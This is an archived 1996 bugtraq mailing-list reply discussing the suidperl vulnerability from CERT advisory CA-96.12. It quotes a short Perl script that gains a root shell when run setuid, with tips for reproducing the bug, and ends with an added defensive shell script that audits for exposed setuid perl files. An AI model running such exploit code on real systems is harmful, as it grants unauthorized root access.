[2843] in bugtraq


Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability

daemon@ATHENA.MIT.EDU (Rob J. Nauta)
Sun Jun 30 13:10:57 1996

Date: 	Sun, 30 Jun 1996 11:54:01 +0200
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: "Rob J. Nauta" <rob@brasaap.iaehv.nl>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To:  <Pine.LNX.3.91.960629021654.15516g-100000@inorganic5.chem.ufl.edu> from "Jon Lewis" at Jun 29,
              96 02:24:49 am

>
> On Fri, 28 Jun 1996 ichudov@algebra.com wrote:
>
> >
> > What is the exploit?
>
> Run this as a suid or sgid script.  It doesn't matter what user or group
> it's suid/sgid to...it gets root access.
>
> #!/usr/bin/perl
> $ENV{PATH}="/bin:/usr/bin";
> $>=0;$<=0;
> exec("/bin/bash");

I think it's not entirely correct. I was able to reproduce the bug
with #!/usr/bin/suidperl -U as the first line. You need the -U or else
suidperl will complain about an insecure function being used. I also
used system("/usr/bin/id"); which is more obvious to verify whether the
bug exists.

> Is it just me...or does it give people the willies knowing such an easy
> to exploit hole was on their systems...perhaps for years.

Certainly! I mean, I first heard about this via the CERT advisory while
I am on most security lists. I guess via the PERL newsgroups/mailing
lists there was an earlier alert, which the bad guys could've gotten,
a bad one for all security folks! Nothing on bugtraq or the -alert
lists, I guess many sites could have gotten hacked by people reading
PERL news. This just shows 1) CERT alerts aren't that bad, by reading
it I reproduced an exploit in minutes 2) security lists aren't everything,
don't rely on them too much 3) the usenet security newsgroups are just
entertainment and have no useful purpose for discussing new bugs, just
general 'what is a firewall?' questions 4) bugtraq doesn't really meet
its 'full disclosure' charter, nobody who knew the bug bothered to send
in an exploit.

I checked an internet provider and they had a new suidperl with a date
of June 2nd which was a safe one. I guess they have better sources than
me, which is always a disappointment.

Rob

--
                               /;    ;\
                           __  \\____//     From the keyboard of
                          /{_\_/  \`'\_/__    Rob J. Nauta
   \;/                    \___   (o\  /o  }     rob@nauta.it
 __//_______________________/          :--'       rjn@pobox.com
/ //########            ####  \_    `__\
 // ######      ####   ####     \___(o'o)
=/    ###     #######    ###       `===='
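An audit script a system administrator could run after reading this thread, added here and not part of the original posts: it lists setuid suidperl/sperl interpreters and any setuid or setgid script whose shebang hands it to perl (with or without the -U flag discussed above), which are the files to take the setuid/setgid bit off until a fixed suidperl is installed. The directory arguments and the sample file names are assumptions.

```shell
#!/bin/sh
# Audit helper (added example, not from the bugtraq thread). Finds the two
# things the suidperl hole needs on a host: a setuid suidperl/sperl binary and
# a setuid/setgid script whose shebang invokes perl. Paths are assumptions.

# Return 0 if the file's first line is a perl shebang: perl, suidperl, sperl,
# versioned perl5.x or "env perl", with or without flags such as -U.
perl_shebang() {
    head -n 1 "$1" 2>/dev/null |
        grep -Eq '^#![[:space:]]*([^[:space:]]*/)?(env[[:space:]]+)?(suid|s)?perl[0-9.]*([[:space:]]|$)'
}

# Print every setuid or setgid regular file under the given directories whose
# shebang invokes perl. Output per hit: mode, owner, group, path.
find_suid_perl_scripts() {
    find "$@" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null |
    while IFS= read -r f; do
        if perl_shebang "$f"; then
            ls -ld "$f" | awk -v p="$f" '{print $1, $3, $4, p}'
        fi
    done
}

# Print setuid suidperl/sperl interpreters under the given directories.
find_suidperl_binaries() {
    find "$@" -type f \( -name suidperl -o -name 'sperl*' \) -perm -4000 \
        -print 2>/dev/null
}

# Combined report. Any hit is a file to strip the setuid/setgid bit from
# (chmod u-s,g-s) until a fixed suidperl is installed. Returns 1 on any hit.
audit_suidperl() {
    hits=$( { find_suidperl_binaries "$@"; find_suid_perl_scripts "$@"; } )
    if [ -n "$hits" ]; then
        printf 'setuid perl exposure found:\n%s\n' "$hits"
        return 1
    fi
    echo "no setuid suidperl or setuid perl scripts under: $*"
    return 0
}

# Typical invocation on a live system (assumed directories):
# audit_suidperl /usr/bin /usr/local/bin /usr/lib /usr/local/lib
```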
